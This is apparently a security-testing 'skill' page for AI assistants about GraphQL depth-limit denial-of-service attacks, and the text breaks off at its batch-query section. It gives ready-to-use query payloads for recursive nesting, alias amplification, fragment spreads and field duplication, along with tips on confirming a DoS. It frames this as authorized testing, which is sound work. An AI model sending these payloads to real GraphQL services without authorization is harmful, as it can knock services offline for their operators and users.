Installer avec Codex ou Claude Copiez ce prompt, collez-le dans Codex, Claude ou un autre assistant, puis laissez-le vérifier la page du skill et l'installer pour vous.
Une commande directe contourne le prompt de vérification. Examinez la source avant de l'exécuter.
GraphQL depth limit attacks exploit the recursive nature of GraphQL schemas to craft deeply nested queries that consume excessive server resources, leading to denial of service. Unlike REST APIs with fixed endpoints, GraphQL allows clients to request arbitrary data structures. When schemas contain circular relationships (e.g., User -> Posts -> Author -> Posts), attackers can create queries that recurse indefinitely, overwhelming the server's CPU, memory, database connections, and network bandwidth.
When to Use
When conducting security assessments that involve performing graphql depth limit attack
When following incident response procedures for related security events
When performing scheduled security testing or auditing activities
When validating security controls through hands-on testing
Most Often Missed & How to Confirm
Beyond raw depth: combine alias amplification, field duplication, and fragment cycles - a server with a depth limit may still fall to width/alias blowup.
Cyclic fragment spreads: self-referential fragments can recurse even when query nesting is capped.
Batching multipliers: array-batched operations and aliased root fields multiply cost in a single HTTP request.
Expensive resolvers: shallow but list-heavy queries (pagination with a huge first:) can exhaust the DB without deep nesting.
How to confirm a hit (avoid false negatives): response time/CPU must rise monotonically with depth/width, and a payload must execute without a "query too deep/complex" error - baseline a trivial query first. Distinguish a real DoS (timeout, 502, connection refused) from a benign validation rejection. Don't conclude negative until you've tried: alias amplification, field duplication, cyclic fragments, batching, and large pagination args - depth limiting alone does not cover complexity.
Prerequisites
Target GraphQL API endpoint with introspection enabled or known schema
GraphQL client tools (GraphiQL, Altair, Insomnia, or curl)
Python 3.8+ with requests library for automated testing
Burp Suite or mitmproxy for traffic analysis
Authorization to perform security testing on the target
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Core Attack Techniques
1. Recursive Depth Attack
When a GraphQL schema has bidirectional relationships, queries can reference them recursively:
# Schema with circular reference:# type User { posts: [Post] }# type Post { author: User }# Attack query with excessive nesting depthquery DepthAttack {
users {
posts {
author {
posts {
author {
posts {
author {
posts {
author {
posts {
author {
posts {
title
author {
name
}}}}}}}}}}}}}}
2. Alias-Based Amplification
When batch queries are blocked, aliases can multiply the same field request within a single query:
query AliasAmplification {a1: user(id:1){ posts { author { name }}}a2: user(id:1){ posts { author { name }}}a3: user(id:1){ posts { author { name }}}a4: user(id:1){ posts { author { name }}}a5: user(id:1){ posts { author { name }}}a6: user(id:1){ posts { author { name }}}a7: user(id:1){ posts { author { name }}}a8: user(id:1){ posts { author { name }}}a9: user(id:1){ posts { author { name }}}a10: user(id:1){ posts { author { name }}}}
3. Fragment Spread Attack
Fragments can be used to construct complex, deeply nested queries more efficiently:
fragment UserFields on User {
name
email
posts {
title
comments {
body
author {...NestedUser
}}}}fragment NestedUser on User {
name
posts {
title
author {
name
posts {
title
author {
name
}}}}}query FragmentAttack {
users {...UserFields
}}
4. Field Duplication Attack
Repeating the same field multiple times within a selection set increases processing:
query FieldDuplication {
user(id:1){
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }
posts { title }}}
5. Batch Query Attack
Sending multiple queries in a single HTTP request: